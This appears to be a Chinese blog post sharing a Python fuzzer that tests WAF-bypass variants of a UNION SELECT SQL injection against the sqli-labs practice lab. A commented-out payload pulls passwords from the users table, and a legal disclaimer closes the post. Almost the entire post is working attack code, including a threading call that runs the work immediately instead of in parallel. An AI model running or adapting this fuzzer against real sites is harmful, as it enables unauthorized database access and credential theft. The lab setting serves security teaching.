以 sqli-labs 第六关为测试环境
成功 bypass
注释里的 payload
可以成功跑出带表名、列名的信息
#encoding = utf8 import requests from queue import Queue import threading fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00'] fuzz_sz = ['',' '] fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"] Fuzz=fuzz_ch+fuzz_sz+fuzz_zs class fuzz: def __init__(self,root,ThreadNum=5): self.root="http://192.168.1.109/sqli/Less-5/?id=1" self.ThreadNum=5 self.headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20', 'Referer': 'http://www.camel.com', 'Cookie': 'whoami=digo8', } self.task =Queue() for a in Fuzz: for b in Fuzz: for c in Fuzz: for d in Fuzz: exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,3 --+" '''exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,password /*!from "+a+b+c+d+"users*/--+"''' self.task.put(exp) self.s_list = [] def visit(self,url): try: r = requests.get(url,headers=self.headers) ret=r.text except: print ("Fail to connect...") ret="" return ret def test_url(self): while not self.task.empty(): url = self.task.get() ret = self.visit(url) if "Dhakkan" in ret and not "error" in ret : self.s_list.append(url) print (url) def work(self): threads = [] for i in range(self.ThreadNum): t = threading.Thread(target=self.test_url()) threads.append(t) t.start() for t in threads: t.join() obj=fuzz("http://192.168.1.109/sqli/Less-5/?id=1") obj.work()
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。